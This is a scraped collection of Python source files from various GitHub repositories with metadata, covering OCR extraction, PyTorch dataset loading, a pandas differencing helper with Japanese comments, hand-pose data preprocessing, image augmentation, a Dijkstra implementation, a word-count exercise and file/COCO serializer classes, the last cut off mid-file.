cv2.imread(croped_image)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n gray = cv2.threshold(gray, 0, 255, cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n\n text = pytesseract.image_to_string(gray, config ='--oem 1 -l eng --psm 8 -c tessedit_char_whitelist=ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789')\n\n # show threshed image\n \n # cv2.imshow(f\"{text}\", image)\n # cv2.imshow(\"thresh\", gray)\n # cv2.waitKey(0)\n # cv2.destroyAllWindows()\n\n stop_time = time.time()\n duration = stop_time-start_time\n # l = [dict(zip([1],[x])) for x in range(1,2)]\n # breakpoint()\n # print(f\"text: {text}, duration: {duration}\")\n result['images']+=[croped_image.split('/')[-1]]\n result['resolution']+=[image.shape[:2]]\n result['text_extracted_processed']+=[text]\n result['duration_in_microseconds']+=[duration]\n result['Actual_text']+=['']\n result['remarks']+=['']\n return result\n\n\n\n# folder_path = '/home/pooja/yolov5_tapansir/runs/detect/exp95/crops/number_plate'\n\n# number_extracted = tess_num_detect_with_folder()\n# # print(type(number_extracted))\n\n\n# df = pd.DataFrame(number_extracted)\n# df.to_csv('/home/pooja/yolov5_tapansir/result_processed.csv')\n# print(\"check result !!!\")\n\n\n# res = ocr_extractor()\n# df = pd.DataFrame(res)\n# df.to_csv('/home/pooja/yolov5_tapansir/result_blur_effect3.csv')\n# print(\"check result !!!\")\n\n\n\n# pip install goslate -->> translates languages.","repo_name":"pooja-crossml/Phidelta","sub_path":"utils/text_extractor.py","file_name":"text_extractor.py","file_ext":"py","file_size_in_byte":9093,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"74886164004","text":"import pathlib\n\nimport torch\nfrom torchvision import transforms\nfrom torchvision.transforms import functional as F\nfrom torch.utils.data import random_split, Subset\n\n\"\"\" This file is used for various data-set utilities, e.g. generating a dataloader object.\n\"\"\"\n\n\ndef load_dataset(dataset_name, **kwargs):\n \"\"\" Loads the specified dataset and returns a PyTorch dataset object.\n\n Applies the standard transformations for said dataset by default.\n \"\"\"\n data_path = pathlib.Path('data').resolve()\n\n if dataset_name == 'cifar10':\n from torchvision.datasets import CIFAR10\n\n # This is the standard normalization transformation\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n # User can specify to load the training set; loads the test set by default.\n train = kwargs.pop('train', False)\n dataset = CIFAR10(data_path, train=train, transform=transform, download=True)\n elif dataset_name == 'cifar100':\n from torchvision.datasets import CIFAR100\n\n # This is the standard normalization transformation\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n ])\n\n # User can specify to load the training set; loads the test set by default.\n train = kwargs.pop('train', False)\n dataset = CIFAR100(data_path, train=train, transform=transform, download=True)\n elif dataset_name == 'imagenet':\n # Requires imagenet to be downloaded locally\n from torchvision.datasets import ImageNet\n\n # Standard transformation\n transform = transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n ])\n dataset = ImageNet(data_path / 'imagenet', split='val', transform=transform)\n elif dataset_name == 'cifar10r':\n from data.nonstationary_datasets import CIFAR10R\n dataset = CIFAR10R()\n elif dataset_name == 'cifar100r':\n from data.nonstationary_datasets import CIFAR100R\n dataset = CIFAR100R()\n elif dataset_name == 'cifar10gb':\n from data.nonstationary_datasets import CIFAR10GB\n dataset = CIFAR10GB()\n elif dataset_name == 'cifar100gb':\n from data.nonstationary_datasets import CIFAR100GB\n dataset = CIFAR100GB()\n elif dataset_name == 'cifar10imba':\n from data.imbalanced_datasets import CIFAR10Imba\n dataset = CIFAR10Imba(class_ratios=kwargs['class_ratios'])\n else:\n raise NotImplementedError\n\n return dataset\n\n\ndef get_cal_eval_split(dataset_name, num_eval, **kwargs):\n \"\"\" Splits the given dataset into disjoint calibration / evaluation subsets.\n\n Args:\n dataset_name: str ;\n num_eval: int ; size of evaluation set\n \"\"\"\n dataset = load_dataset(dataset_name, **kwargs)\n num_cal = len(dataset) - num_eval\n cal_dataset, eval_dataset = random_split(dataset, [num_cal, num_eval])\n if 'num_cal' in kwargs.keys():\n cal_dataset = Subset(cal_dataset, torch.arange(kwargs['num_cal']))\n\n return cal_dataset, eval_dataset\n","repo_name":"GavinKerrigan/bayesian-calibration","sub_path":"utils/data_utils.py","file_name":"data_utils.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10441091027","text":"# 提供された関数 differentiate は、Pandasのデータフレームを操作して、指定した列の差分を計算し、元のデータフレームに新しい列として追加する関数です。関数の引数とその動作について説明します:\n\n# df: 差分を計算する対象のデータフレーム。\n# ver: 差分を計算する列の名前。\n# on: データをグループ化するための列の名前。デフォルトは 'user_id'。\n# dir: 差分を計算する方向。デフォルトは 1(前方差分)。-1を指定すると後方差分が計算されます。\n# 関数の動作手順:\ndef differentiate(df, ver, on='user_id', dir=1):\n # _df という新しいデータフレームを df のコピーとして作成します。\n _df = df.copy()\n # _df を on 列でグループ化し、指定された ver 列に対して前方または後方の差分を計算します。結果は新しい _df データフレームに格納されます。\n _df = _df.groupby([on], as_index=False)[[ver]].diff(dir)\n # _df の列名を 'd_' + ver に変更します。これにより、新しい列名が 'd_' で始まるようになります。\n _df.columns = ['d_'+ver]\n # 元のデータフレーム df に計算された差分列を結合します。\n df = df.join(_df)\n # 不要な _df を削除し、メモリを解放します。\n del _df\n # 最終的に元のデータフレーム df を返します。\n gc.collect()\n return df\n\n# この関数を使用することで、データフレーム内の特定の列に対して前方または後方の差分を計算し、新しい列として追加できます。計算された差分は、元のデータを補完するのに役立つことがあります。\n# gc.collect() は、Pythonの標準ライブラリである gc(ガベージコレクション)モジュールから提供される関数で、メモリのガベージコレクションを明示的にトリガーするために使用されます。ガベージコレクションは、不要なメモリを解放し、Pythonプログラムのパフォーマンスを向上させるために行われるプロセスです。\n# 具体的には、gc.collect() を呼び出すことで、Pythonのメモリ管理システムは現在の実行環境で不要とされるオブジェクトを収集し、それらのメモリを解放します。\n# 通常、Pythonは自動的にメモリ管理を行いますが、大規模なオブジェクトやデータ処理を行った後、メモリが完全に解放されない場合があるため、gc.collect() を使用して明示的にガベージコレクションをトリガーすることがあります。\n# gc.collect() を呼び出すことは、メモリリーク(不要なメモリの確保)を防ぐために役立ちます。ただし、通常は必要な場合にのみ使用すべきであり、プログラム全体で頻繁に呼び出す必要はありません。メモリ管理は通常、Pythonインタプリタによって効果的に処理されます。\n# 注意: gc.collect() の過度な使用は、パフォーマンスの低下や不安定な動作を引き起こす可能性があるため、慎重に使用する必要があります。通常、普段は手動でガベージコレクションをトリガーする必要はありません。\n\n\n\n# 提供された関数 differentiate を使用して、具体的なPythonコードの例を示します。この例では、サンプルデータを使用して関数を実行し、差分列を計算し新しい列として追加します。\nimport pandas as pd\nimport gc\n\n# サンプルデータフレームを作成\ndata = {\n 'user_id': [1, 1, 1, 2, 2, 3, 3],\n 'value': [10, 12, 15, 20, 22, 30, 35],\n}\n\ndf = pd.DataFrame(data)\n\n# differentiate関数を使用して前方差分を計算し、新しい列として追加\ndf = differentiate(df, ver='value', on='user_id', dir=1)\n\n# このコードでは、以下のことが行われています:\n# サンプルのデータフレーム df を作成し、'user_id' 列と 'value' 列が含まれていま���。\n# differentiate 関数を呼び出し、ver='value' で 'value' 列の差分を計算するように指定し、on='user_id' で 'user_id' 列をグループ化の基準として指定します。また、dir=1 で前方差分を計算するように指定します。\n# 計算された差分列は 'd_value' という名前で新しい列として元のデータフレーム df に追加されます。\n# 出力結果は以下のようになります:\n\n# user_id value d_value\n# 0 1 10 NaN\n# 1 1 12 2.0\n# 2 1 15 3.0\n# 3 2 20 NaN\n# 4 2 22 2.0\n# 5 3 30 NaN\n# 6 3 35 5.0\n\n# 結果として、'd_value' 列が追加され、 'value' 列の前方差分が計算されています。最初の行にはNaN(欠損値)が表示されます。このように、differentiate 関数を使用することで、データフレーム内の特定の列に対して前方または後方の差分を計算し、新しい列として追加できます。\n","repo_name":"ChanhiYasutomi/Code_For_DataAnalysis_For_Python","sub_path":"def differentiate.py","file_name":"def differentiate.py","file_ext":"py","file_size_in_byte":5222,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19534571471","text":"# this file is modified from the original code:\n# https://github.com/xingyizhou/DeepModel\n\nimport numpy as np\nimport h5py\nimport scipy.io as sio\nimport scipy.misc as misc\nimport sys\nimport os\nimport math\n\nfrom skimage.transform import resize\n\nfrom PIL import Image\n\nimport cv2\n\n## This part of code is modified from [DeepPrior](https://cvarlab.icg.tugraz.at/projects/hand_detection/)\ndef CropImage(depth, com, cube_size):\n u, v, d = com\n zstart = d - cube_size / 2.\n zend = d + cube_size / 2.\n \n # pricinal points are omitted (due to simplicity?)\n xstart = int(math.floor((u * d / fx - cube_size / 2.) / d * fx))\n xend = int(math.floor((u * d / fx + cube_size / 2.) / d * fx))\n ystart = int(math.floor((v * d / fy - cube_size / 2.) / d * fy))\n yend = int(math.floor((v * d / fy + cube_size / 2.) / d * fy))\n \n cropped = depth[max(ystart, 0):min(yend, depth.shape[0]), max(xstart, 0):min(xend, depth.shape[1])].copy()\n cropped = np.pad(cropped, ((abs(ystart)-max(ystart, 0), abs(yend)-min(yend, depth.shape[0])), \n (abs(xstart)-max(xstart, 0), abs(xend)-min(xend, depth.shape[1]))), mode='constant', constant_values=0)\n msk1 = np.bitwise_and(cropped < zstart, cropped != 0)\n msk2 = np.bitwise_and(cropped > zend, cropped != 0)\n cropped[msk1] = zstart\n cropped[msk2] = zend\n\n dsize = (img_size, img_size)\n wb = (xend - xstart)\n hb = (yend - ystart)\n if wb > hb:\n sz = (dsize[0], (int)(hb * dsize[0] / wb))\n else:\n sz = ((int)(wb * dsize[1] / hb), dsize[1])\n\n roi = cropped\n \n \n rz = cv2.resize(cropped, sz)\n # maxmin = cropped.max() - cropped.min()\n # cropped_norm = (cropped - cropped.min()) / maxmin\n # rz = maxmin * resize(cropped_norm, sz, mode='reflect', preserve_range=True) + cropped.min()\n # rz = rz.astype(np.float32)\n\n ret = np.ones(dsize, np.float32) * zend\n xstart = int(math.floor(dsize[0] / 2 - rz.shape[1] / 2))\n xend = int(xstart + rz.shape[1])\n ystart = int(math.floor(dsize[1] / 2 - rz.shape[0] / 2))\n yend = int(ystart + rz.shape[0])\n ret[ystart:yend, xstart:xend] = rz\n\n return ret\n\ndef readDepth(path):\n \"\"\"\n Note: In each depth png file the top 8 bits of depth are\n packed into the green channel and the lower 8 bits into blue.\n See http://cims.nyu.edu/~tompson/NYU_Hand_Pose_Dataset.htm#download\n Ref: [1]\n \"\"\"\n rgb = Image.open(path)\n print(rgb)\n r, g, b = rgb.split()\n\n r = np.asarray(r, np.int32)\n g = np.asarray(g, np.int32)\n b = np.asarray(b, np.int32)\n\n # dpt = b + g*256\n\n dpt = np.bitwise_or(np.left_shift(g, 8), b)\n imgdata = np.asarray(dpt, np.float32)\n return imgdata\n\n##\nJ = 31\n# joint_id = np.array([0, 3, 6, 9, 12, 15, 18, 21, 24, 25, 27, 30, 31, 32, 1, 2, 4, 7, 8, 10, 13, 14, 16, 19, 20, 22, 5, 11, 17, 23, 28])\njoint_id = np.array([0, 1, 2, 3, 4, 6, 7, 8, 9, 10, 12, 13, 14, 15, 16, 18, 19, 20, 21, 22, 5, 11, 17, 23, 32, 30, 31, 28, 27, 25, 24])\nimg_size = 128\n\nfx = 588.03\nfy = 587.07\nfu = 320.\nfv = 240.\n\ndata_names = ['train', 'test_1', 'test_2']\ncube_sizes = [300, 300, 300]\nid_starts = [0, 0, 2440]\nid_ends = [72756, 2440, 8252]\n#id_ends = [727, 2440, 8252]\n# num_packages = [3, 1, 1]\nnum_packages = [1, 1, 1]\n\ndef makeH5(root='../data/nyu14/'):\n\n for D in range(0, len(data_names)):\n data_name = data_names[D]\n cube_size = cube_sizes[D]\n id_start = id_starts[D]\n id_end = id_ends[D]\n chunck_size = (int)((id_end - id_start) / num_packages[D])\n\n task = 'train' if data_name == 'train' else 'test'\n data_path = '{}/{}'.format(root, task)\n label_path = '{}/joint_data.mat'.format(data_path)\n\n labels = sio.loadmat(label_path)\n joint_uvd = labels['joint_uvd'][0]\n joint_xyz = labels['joint_xyz'][0]\n\n cnt = 0\n chunck = 0\n depth_h5, joint_h5, com_h5, = [], [], []\n for idx in range(id_start, id_end):\n img_path = '{}/depth_1_{:07d}.png'.format(data_path, idx + 1)\n\n if not os.path.exists(img_path):\n print('{} Not Exists!'.format(img_path))\n continue\n\n print(img_path)\n depth = readDepth(img_path)\n\n # is joint_uvc[id, 34] center of mass???\n \n depth = CropImage(depth, joint_uvd[idx, 34], cube_size)\n\n com3D = joint_xyz[idx, 34]\n joint = joint_xyz[idx][joint_id] - com3D\n \n # normalize depth to [-1,1] and resize to one of the shape [128,128]\n depth = ((depth - com3D[2]) / (cube_size / 2)).reshape(1, img_size, img_size)\n\n # normalized ground truth joint 3d coordinates to [-1,1]\n joint = np.clip(joint / (cube_size / 2), -1, 1)\n depth_h5.append(depth.astype(np.float32))\n joint_h5.append(joint.astype(np.float32).reshape(3 * J))\n com_h5.append(com3D.copy())\n cnt += 1\n if cnt % chunck_size == 0 or idx == id_end - 1:\n dH5 = os.path.join(root, 'h5data/')\n try:\n os.makedirs(dH5)\n except OSError:\n pass\n \n # rng = np.arange(cnt) if task == 'test' else np.random.choice(np.arange(cnt), cnt, replace = False)\n dset = h5py.File((dH5+'/{}_{}.h5').format(data_name, chunck), 'w')\n dset['depth'] = np.asarray(depth_h5)\n dset['joint'] = np.asarray(joint_h5)\n dset['com'] = np.asarray(com_h5)\n dset.close()\n chunck += 1\n cnt = 0\n \nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Specify the root directory of NYU14 directory as argument')\n else:\n makeH5(sys.argv[1])\n","repo_name":"jakeoung/handpose_pytorch","sub_path":"code/datasets/GetH5DataNYU.py","file_name":"GetH5DataNYU.py","file_ext":"py","file_size_in_byte":5805,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"14952180676","text":"import os\n\nimport PIL.Image as image\n\nroot = '../data'\ndatasets = ['IDRID', 'DDR']\n\n\ndef do_augment(image_name, mask_name):\n img = image.open(os.path.join(img_path, image_name))\n mask = image.open(os.path.join(mask_path, mask_name))\n\n img.save(os.path.join(img_path, image_name[:-4] + \".jpg\"))\n img.transpose(image.ROTATE_180).save(os.path.join(img_path, image_name[:-4] + \"_180.jpg\"))\n img.transpose(image.ROTATE_90).save(os.path.join(img_path, image_name[:-4] + \"_90.jpg\"))\n img.transpose(image.ROTATE_270).save(os.path.join(img_path, image_name[:-4] + \"_270.jpg\"))\n img.transpose(image.FLIP_LEFT_RIGHT).save(os.path.join(img_path, image_name[:-4] + \"_horizontal.jpg\"))\n img.transpose(image.FLIP_TOP_BOTTOM).save(os.path.join(img_path, image_name[:-4] + \"_vertical.jpg\"))\n\n mask.save(os.path.join(mask_path, mask_name[:-4] + \".png\"))\n mask.transpose(image.ROTATE_180).save(os.path.join(mask_path, mask_name[:-4] + \"_180.png\"))\n mask.transpose(image.ROTATE_90).save(os.path.join(mask_path, mask_name[:-4] + \"_90.png\"))\n mask.transpose(image.ROTATE_270).save(os.path.join(mask_path, mask_name[:-4] + \"_270.png\"))\n mask.transpose(image.FLIP_LEFT_RIGHT).save(os.path.join(mask_path, mask_name[:-4] + \"_horizontal.png\"))\n mask.transpose(image.FLIP_TOP_BOTTOM).save(os.path.join(mask_path, mask_name[:-4] + \"_vertical.png\"))\n\n\nif __name__ == \"__main__\":\n\n for dataset in datasets:\n print(dataset)\n img_path = os.path.join(root, dataset, 'image/train')\n mask_path = os.path.join(root, dataset, 'label/train/annotations')\n\n for mask_name in os.listdir(mask_path):\n image_name = mask_name[:-4] + '.jpg'\n if not os.path.exists(os.path.join(img_path, image_name)):\n print('not found ' + os.path.join(mask_path, mask_name))\n continue\n print(mask_name)\n do_augment(image_name, mask_name)\n","repo_name":"CVIU-CSU/M2MRF-Lesion-Segmentation","sub_path":"tools/augment.py","file_name":"augment.py","file_ext":"py","file_size_in_byte":1924,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"52"} +{"seq_id":"17675103591","text":"import heapq\r\n\r\nN, M = map(int, input().split())\r\n\r\nG = [[] for _ in range(N)]\r\n\r\ncost = []\r\nfor i in range(N):\r\n cost.append([10**10]*N)\r\n\r\nfor _ in range(M):\r\n u, v, c = map(int, input().split())\r\n\r\n G[u].append(v)\r\n cost[u][v] = c\r\n\r\nQ = []\r\nheapq.heappush(Q, (0,0))\r\n\r\ndist = [-1 for _ in range(N)]\r\ndist[0] = 0\r\n\r\ndone = [False for _ in range(N)]\r\n\r\nwhile len(Q) > 0:\r\n # d:距離、i:頂点\r\n d, i = heapq.heappop(Q)\r\n\r\n if done[i]:\r\n continue\r\n\r\n done[i] = True\r\n\r\n # Gは頂点と辺の親子関係を木構造で表す配列\r\n for j in G[i]:\r\n # 重み\r\n c = cost[i][j]\r\n\r\n #まだ見ていないか最短距離が更新できる場合\r\n if dist[j] == -1 or dist[j] > dist[i] + c:\r\n dist[j] = dist[i] + c\r\n heapq.heappush(Q, (dist[j], j))\r\n\r\nprint(dist[N-1])","repo_name":"someya-takashi/AtCoder","sub_path":"Algorithm/dijkstra/dijkstra_heap.py","file_name":"dijkstra_heap.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"70417479205","text":"\n\nimport heapq\nclass Solution(object):\n def eatenApples(self, apples, days):\n \"\"\"\n :type apples: List[int]\n :type days: List[int]\n :rtype: int\n \"\"\"\n total, pos = 0, 1\n N, Q = len(apples), []\n \n for i in range(N):\n if apples[i] == 0:\n continue\n heapq.heappush(Q, [i+days[i]+1, apples[i], i+1])\n stack = []\n while Q:\n if pos >= Q[0][0]:\n stack.append(heapq.heappop(Q))\n continue\n \n rotten, count, j = Q[0]\n pos = max(pos, j)\n m = min(count, rotten - pos+1)\n if m > 0:\n pos += m\n total += m \n print(Q[0], total, pos)\n stack.append(heapq.heappop(Q))\n \n print(stack)\n print(total)\n \n \n \nif __name__ == '__main__':\n s = Solution()\n # s.eatenApples([2,1,1,4,5],[10,10,6,4,2])\n s.eatenApples([1,2,3,5,2],[3,2,1,4,2])","repo_name":"icecraft/cuda-improve","sub_path":"tools/1705.py","file_name":"1705.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14902996719","text":"\"\"\"\n ---Task 3---\nВ большой текстовой строке подсчитать количество встречаемых слов и вернуть 10 самых частых. Не учитывать знаки\nпрепинания и регистр символов. За основу возьмите любую статью из википедии или из документации к языку.\n\"\"\"\nfrom string import punctuation\n\n\ndef count_words(text):\n for char in punctuation:\n text = text.replace(char, \"\")\n\n text = text.lower()\n words = text.split()\n\n word_counts = {}\n for word in words:\n if word in word_counts:\n word_counts[word] += 1\n else:\n word_counts[word] = 1\n\n most_common_words = sorted(word_counts.items(), key=lambda x: x[1], reverse=True)[:10]\n return most_common_words\n\n\ntext = 'Python is dynamically typed and garbage-collected. It supports multiple programming paradigms, including ' \\\n 'structured (particularly procedural), object-oriented and functional programming. It is often described as a ' \\\n '\"batteries included\" language due to its comprehensive standard library.'\n\nmost_common_words = count_words(text)\nprint(most_common_words)\n","repo_name":"caregor/EntPy_HW_3","sub_path":"task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12962551683","text":"import itertools\nimport json\nimport os\nfrom collections import defaultdict\nfrom typing import DefaultDict, Dict, List, Optional, Sequence, Union\n\nfrom jsonlines import Reader, Writer\n\nfrom ..utils.context import timed_operation\nfrom ..utils.detection_types import JsonDict, Pathlike\nfrom ..utils.identifier import get_uuid_from_str\nfrom ..utils.pdf_utils import PDFStreamer\nfrom ..utils.tqdm import get_tqdm\nfrom ..utils.utils import FileExtensionError, is_file_extension\nfrom .base import DataFlow\nfrom .common import FlattenData, JoinData, MapData\nfrom .custom import CacheData, CustomDataFromIterable, CustomDataFromList\n\n__all__ = [\"SerializerJsonlines\", \"SerializerFiles\", \"SerializerCoco\", \"SerializerPdfDoc\", \"SerializerTabsepFiles\"]\n\n\ndef _reset_df_and_get_length(df: DataFlow) -> int:\n df.reset_state()\n try:\n length = len(df)\n except NotImplementedError:\n length = 0\n return length\n\n\nclass SerializerJsonlines:\n \"\"\"\n Serialize a dataflow from a jsonlines file. Alternatively, save a dataflow of JSON objects to a .jsonl file.\n\n **Example:**\n\n df = SerializerJsonlines.load(\"path/to/file.jsonl\")\n df.reset_state()\n for dp in df:\n ... # is a dict\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoints: Optional[int] = None) -> CustomDataFromIterable:\n \"\"\"\n :param path: a path to a .jsonl file.\n :param max_datapoints: Will stop the iteration once max_datapoints have been streamed\n\n :return: dataflow to iterate from\n \"\"\"\n file = open(path, \"r\") # pylint: disable=W1514,R1732\n iterator = Reader(file)\n return CustomDataFromIterable(iterator, max_datapoints=max_datapoints)\n\n @staticmethod\n def save(df: DataFlow, path: Pathlike, file_name: str, max_datapoints: Optional[int] = None) -> None:\n \"\"\"\n Writes a dataflow iteratively to a .jsonl file. Every datapoint must be a dict where all items are serializable.\n As the length of the dataflow cannot be determined in every case max_datapoint prevents generating an\n unexpectedly large file\n\n :param df: The dataflow to write from.\n :param path: The path, the .jsonl file to write to.\n :param file_name: name of the target file.\n :param max_datapoints: maximum number of datapoint to consider writing to a file.\n \"\"\"\n\n if not os.path.isdir(path):\n raise NotADirectoryError(path)\n if not is_file_extension(file_name, \".jsonl\"):\n raise FileExtensionError(f\"Expected .jsonl file got {path}\")\n\n df.reset_state()\n with open(os.path.join(path, file_name), \"w\") as file: # pylint: disable=W1514\n writer = Writer(file)\n for k, dp in enumerate(df):\n if max_datapoints is None:\n writer.write(dp)\n elif k < max_datapoints:\n writer.write(dp)\n else:\n break\n\n\nclass SerializerTabsepFiles:\n \"\"\"\n Serialize a dataflow from a tab separated text file. Alternatively, save a dataflow of plain text\n to a .txt file.\n\n **Example**:\n\n df = SerializerTabsepFiles.load(\"path/to/file.txt\")\n\n will yield each text line of the file.\n \"\"\"\n\n @staticmethod\n def load(path: Pathlike, max_datapoins: Optional[int] = None) -> CustomDataFromList:\n \"\"\"\n :param path: a path to a .txt file.\n :param max_datapoins: Will stop the iteration once max_datapoints have been streamed\n\n :return: dataflow to iterate from\n \"\"\"\n\n with open(path, \"r\", encoding=\"UTF-8\") as file:\n file_list = file.readlines()\n return CustomDataFromList(file_list, max_datapoints=max_datapoins)\n\n @staticmethod\n def save(df: DataFlow, path: Pathlike, file_name: str, max_datapoints: Optional[int] = None) -> None:\n \"\"\"\n Writes a dataflow iteratively to a .txt file. Every datapoint must be a string.\n As the length of the dataflow cannot be determined in every case max_datapoint prevents generating an\n unexpectedly large file\n\n :param df: The dataflow to write from.\n :param path: The path, the .txt file to write to.\n :param file_name: name of the target file.\n :param max_datapoints: maximum number of datapoint to consider writing to a file.\n \"\"\"\n\n if not os.path.isdir(path):\n raise NotADirectoryError(path)\n if not is_file_extension(file_name, \".jsonl\"):\n raise FileExtensionError(f\"Expected .txt file got {path}\")\n\n with open(os.path.join(path, file_name), \"w\", encoding=\"UTF-8\") as file:\n for k, dp in enumerate(df):\n if max_datapoints is None:\n file.write(dp)\n elif k < max_datapoints:\n file.write(dp)\n else:\n break\n\n\nclass SerializerFiles:\n \"\"\"\n Serialize files from a directory and all subdirectories. Only one file type can be serialized. Once specified, all\n other types will be filtered out.\n \"\"\"\n\n @staticmethod\n def load(\n path: Pathlike,\n file_type: Union[str, Sequence[str]],\n max_datapoints: Optional[int] = None,\n shuffle: Optional[bool] = False,\n sort: Optional[bool] = True,\n ) -> DataFlow:\n \"\"\"\n Generates a dataflow where a datapoint consists of a string of names of files with respect to some file type.\n If you want to load the files you need to do this in a following step by yourself.\n\n :param path: A path to some base directory. Will inspect all subdirectories, as well\n :param file_type: A file type (suffix) to look out for (single str or list of stings)\n :param max_datapoints: Stop iteration after passing max_datapoints\n :param shuffle: Shuffle the files, so that the order of appearance in dataflow is random.\n :param sort: If set to \"True\" it will sort all selected files by its string\n :return: dataflow to iterate from\n \"\"\"\n df: DataFlow\n df1: DataFlow\n df2: DataFlow\n df3: DataFlow\n\n if shuffle:\n sort = False\n it1 = os.walk(path, topdown=False)\n it2 = os.walk(path, topdown=False)\n df1 = CustomDataFromIterable(it1)\n df2 = CustomDataFromIterable(it2)\n df1 = MapData(df1, lambda dp: None if len(dp[2]) == 0 else dp)\n df2 = MapData(df2, lambda dp: None if len(dp[2]) == 0 else dp)\n df1 = MapData(df1, lambda dp: [dp[0]] * len(dp[2]))\n df2 = MapData(df2, lambda dp: dp[2])\n df1 = FlattenData(df1)\n df2 = FlattenData(df2)\n df3 = JoinData(df_lists=[df1, df2])\n df3 = MapData(df3, lambda dp: os.path.join(dp[0], dp[1]))\n df = MapData(df3, lambda dp: dp if is_file_extension(dp, file_type) else None)\n if max_datapoints is not None or sort:\n df_list = CacheData(df).get_cache()\n if sort:\n df_list.sort()\n df = CustomDataFromList(df_list, max_datapoints=max_datapoints, shuffle=False)\n elif shuffle:\n df_list = CacheData(df).get_cache()\n df = CustomDataFromList(df_list, shuffle=shuffle)\n\n return df\n\n @staticmethod\n def save() -> None:\n \"\"\"\n Not implemented\n \"\"\"\n raise NotImplementedError\n\n\nclass CocoParser:\n \"\"\"\n A simplified version of the Microsoft COCO helper class for reading annotations. It currently supports only\n bounding box annotations\n\n :param annotation_file: location of annotation file\n \"\"\"\n\n def __init__(self, annotation_file: Optional[Pathlike] = None) -> None:\n self.dataset: JsonDict = {}\n self.anns: Dict[int, JsonDict] = {}\n self.cats: Dict[int, JsonDict] = {}\n self.imgs: Dict[int, JsonDict] = {}\n\n self.img_to_anns: DefaultDict[int, List[int]] = defaultdict(list)\n self.cat_to_imgs: DefaultDict[int, List[int]] = defaultdict(list)\n\n if annotation_file is not None:\n with timed_operation(message=\"Loading annotations to memory\"):\n with open(annotation_file, \"r\", encoding=\"UTF-8\") as file:\n dataset = json.load(file)\n if not isinstance(dataset, dict):\n raise TypeError(f\"Annotation file format {type(dataset)} for {annotation_file} not supported\")\n self.dataset = dataset\n self._create_index()\n\n def _create_index(self) -> None:\n with timed_operation(message=\"creating index\"):\n anns, cats, imgs = {}, {}, {}\n img_to_anns, cat_to_imgs = defaultdict(list), defaultdict(list)\n if \"annotations\" in self.dataset:\n for ann in self.dataset[\"annotations\"]:\n img_to_anns[ann[\"image_id\"]].append(ann)\n anns[ann[\"id\"]] = ann\n\n if \"images\" in self.dataset:\n for img in self.dataset[\"images\"]:\n imgs[img[\"id\"]] = img\n\n if \"categories\" in self.dataset:\n for cat in self.dataset[\"categories\"]:\n cats[cat[\"id\"]] = cat\n\n if \"annotations\" in self.dataset and \"categories\" in self.dataset:\n for ann in self.dataset[\"annotations\"]:\n cat_to_imgs[ann[\"category_id\"]].append(ann[\"image_id\"])\n\n self.anns = anns\n self.img_to_anns = img_to_anns\n self.cat_to_imgs = cat_to_imgs\n self.imgs = imgs\n self.cats = cats\n\n def info(self) -> None:\n \"\"\"\n Print information about the annotation file.\n \"\"\"\n for key, value in self.dataset[\"info\"].items():\n print(f\"{key}: {value}\")\n\n def get_ann_ids(\n self,\n img_ids: Optional[Union[int, Sequence[int]]] = None,\n cat_ids: Optional[Union[int, Sequence[int]]] = None,\n area_range: Optional[Sequence[int]] = None,\n is_crowd: Optional[bool] = None,\n ) -> Sequence[int]:\n \"\"\"\n Get ann ids that satisfy given filter conditions. default skips that filter\n\n :param img_ids: get anns for given imgs\n :param cat_ids: get anns for given cats\n :param area_range: get anns for given area range (e.g. [0 inf])\n :param is_crowd: get anns for given crowd label (False or True)\n\n :return: ids: integer array of ann ids\n \"\"\"\n\n if img_ids is None:\n img_ids = []\n if cat_ids is None:\n cat_ids = []\n if area_range is None:\n area_range = []\n\n img_ids = [img_ids] if isinstance(img_ids, int) else img_ids\n cat_ids = [cat_ids] if isinstance(cat_ids, int) else cat_ids\n\n if len(img_ids) == len(cat_ids) == len(area_range) == 0:\n anns = self.dataset[\"annotations\"]\n else:\n if not len(img_ids) == 0:\n lists = [self.img_to_anns[img_id] for img_id in img_ids if img_id in self.img_to_anns]\n anns = list(itertools.chain.from_iterable(lists))\n else:\n anns = self.dataset[\"annotations\"]\n anns = anns if len(cat_ids) == 0 else [ann for ann in anns if ann[\"category_id\"] in cat_ids]\n anns = (\n anns if len(area_range) == 0 else [ann for ann in anns if area_range[0] < ann[\"area\"] < area_range[1]]\n )\n if is_crowd is not None:\n ids = [ann[\"id\"] for ann in anns if ann[\"iscrowd\"] == is_crowd]\n else:\n ids = [ann[\"id\"] for ann in anns]\n return ids\n\n def get_cat_ids(\n self,\n category_names: Optional[Union[str, Sequence[str]]] = None,\n super_category_names: Optional[Union[str, Sequence[str]]] = None,\n category_ids: Optional[Union[int, Sequence[int]]] = None,\n ) -> Sequence[int]:\n \"\"\"\n Filtering parameters. default skips that filter.\n\n :param category_names: get cats for given cat names\n :param super_category_names: get cats for given super category names\n :param category_ids: get cats for given cat 